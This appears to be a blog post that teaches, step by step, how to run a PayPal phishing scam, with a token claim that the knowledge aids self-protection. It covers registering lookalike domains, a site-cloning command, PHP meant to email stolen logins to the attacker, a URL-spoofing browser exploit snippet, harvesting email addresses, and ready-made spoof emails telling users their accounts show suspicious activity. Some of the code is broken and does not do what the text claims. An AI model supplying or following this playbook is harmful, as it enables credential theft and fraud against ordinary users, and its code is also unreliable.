Phishing Sites

Share This:

A Phishing site is a site designed to trick people into giving away important information. In most cases they try to get information to steal your identity. However some more elaborate phishing sites can be set up to steal valuable company data, corporate espionage. In this post I will teach you how to setup a phishing scam. The reason why it is important to know this is because if you know how it is done, then you will know how to protect yourself.

Planning the attack

All phishing sites are websites. In theory you don’t need a domain name. And if you use a domain name you can easily setup a DNS server. However if your DNS server isn’t registered threw ICANN then users will get a warning on their web browser. So what many phishers will do is try their best to be creative when purchasing a domain name.

Note: About 35% of the people I talk to don’t even look at the web browsers address bar. So it could be easy enough to have a site that looks like another site and have completely different domain name.

So lets say our phishing scam is to make people believe that it is a Pay Pal website. Since Pay Pal owns paypal.com we can’t purchase it. But their is nothing stopping us from purchasing a domain name that looks similair and is also availible. So we will now examine the letters in the domain name paypal.com




One thing we notice is that paypal.com looks like paypa1.com. So we can check to see if it is availible. As you can see we use the number 1 to for the L in paypal.com. We did this because the number 1 resembles the lower case letter L. So you can easily trick users in such ways.

Another trick we can use is knowing that most websites have sub domains, such as www.paypal.com or developer.paypal.com. So what we can do is register a domain such as login-paypal.com or login-paypa1.com. Because we have the dash it isn’t a sub domain but can also be deceiving.

Once we have picked out our domain name, and purchased it we can be all set to start creating our phishing site.

Creating the Phishing Site

Their are many ways of easily creating a website that looks exactly like the site we plan on phishing with. We could use our web browser right click on the site and save it to our computer. If we are using Linux then we can also use the wget tool. However in this post I will use HTTrack, mainly because of it’s spead and the fact that it is for Windows, Mac, Linux, BSD & Solaris. So using HTTrack will work pretty much the same way regardless of your Operating System. So lets fetch the websites data.




If we have HTTrack installed on our computer we can navigate to it’s location and type the following in our command prompt or terminal.


httrack "https://www.paypal.com" -O "somedir" "+*.paypal.com/*" -v

The above command will download the entire site to our computer. Depending on the size of our site this could take awhile.

Once the site has finished downloading to our computer we can look at the source code of the site. We now can make changes as we please.

Some code we will want to modify is the login portion. Lets change it to email us the username and password the user types. We will also want to have it redirect over to the official Pay Pal sites wrong password page. This will make users think they mistyped the password and they will attempt to type it again.

<?php
if (isset($_REQUEST['email']))
//if "email" is filled out, send email
{
//send email
$email = $_REQUEST['email'] ;
$subject = $_REQUEST['subject'] ;
$message = $_REQUEST['message'] ;
mail("[email protected]", $subject,
$message, "From:" . $email);
$url = 'https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit';
}
else
//if "email" is not filled out, display the form
{
echo "<form method='post' action='mailform.php'>
Email: <input name='email' type='text' /><br />
Subject: <input name='subject' type='text' /><br />
Message:<br />
<textarea name='message' rows='15' cols='40'>
</textarea><br />
<input type='submit' />
</form>";
}
?>

Note: Even if a user types the wrong password on the phishing site we can make good guesses as to what it may be. Eventually we will have full access to the site.

Another thing worth mentioning is that at some times their may be certain exploits for some web browsers that allow spoofing of URL’s. Back during the days of Internet Explorer 5 their was an exploit that would do such a thing. And recently an exploit was discovered for the safari mobile browser for iOS 5.1 (iPhone, iPod Touch, iPad). Such exploits can be used to phishers advantage. So we could add the code to create this exploit.


<script type="text/javascript">
document.getElementById('one').onclick = function() {
myWindow=window.open('http://www.paypal.com','eintitel','width=200,height=100,location=yes');
myWindow.document.write("<html><head><script src='/google_analytics_auto.js'></script></head><body><iframe src=\"http://login-paypa1.com\");></iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>

Once we have made our modifications we will upload our phishing site a server. We can purchase hosting threw a hosting provider or we can setup our own LAMP server.




Once the site has been uploaded we are all set to start phishing.

Getting Victims to come to our phishing site.

To get our victims to come to our site, we can do many different things. Some of the things we can do are listed below.

  • E-Mail the victim
  • Post a link online somewhere (Online support forums, blogs, social networks)
  • Attack the victims router and make it so everytime he or she goes to Pay Pal they will get redirected to the phishing site
  • Write a peace of malware that modifies the victims host file

E-Mailing victims is the most common method of luring users to the phishing site. So we will do this. But first we will need a list of E-Mail addresses. This really isn’t a problem. People post their E-Mail addresses all over the web. So we just need an E-Mail harvester to harvest all of these E-Mail Addresses.

Note: Obviosly not all of the E-Mails we collect will be addresses of people who have a Pay Pal account. But we wont really care to much. The user will most likely know it is a phishing scam since they don’t have a Pay Pal account & they will just mark it as spam.

Once we have our list of E-Mails we will want to send a spoof E-Mail. We will make the E-Mail look like it is coming from Pay Pal. So to do this we will have the from field say something like [email protected] To make the address show up like this we will need one of two things.




Either an SMTP Server or a script that uses an SMTP server. We will use the second method to save us time. When sending the message we will write something like the following.

Dear Pay Pal User

The security department has noticed some suspicious activity from your account. Please log in to Pay Pal as soon as possible to check if any unauthorized charges have been made. We have provided the link to us in this E-Mail.

Link: login-paypa1.com

Another thing we can do is mask the link to make it look like it is going to go to Pay Pal’s Website. Of course this requires sending the mail in HTML view.

Dear Pay Pal User

The security department has noticed some suspicious activity from your account. Please log in to Pay Pal as soon as possible to check if any unauthorized charges have been made. We have provided the link to us in this E-Mail.

Link: login-paypal.com

And since we’re sending mail in HTML mode lets add the official Pay Pal Logo.

 

Once the Victum goes to our site we can see when where and what they looked at the site on. More then enough info for us. And then once they type in their username and password we then pretty much own them.

2 thoughts on “Phishing Sites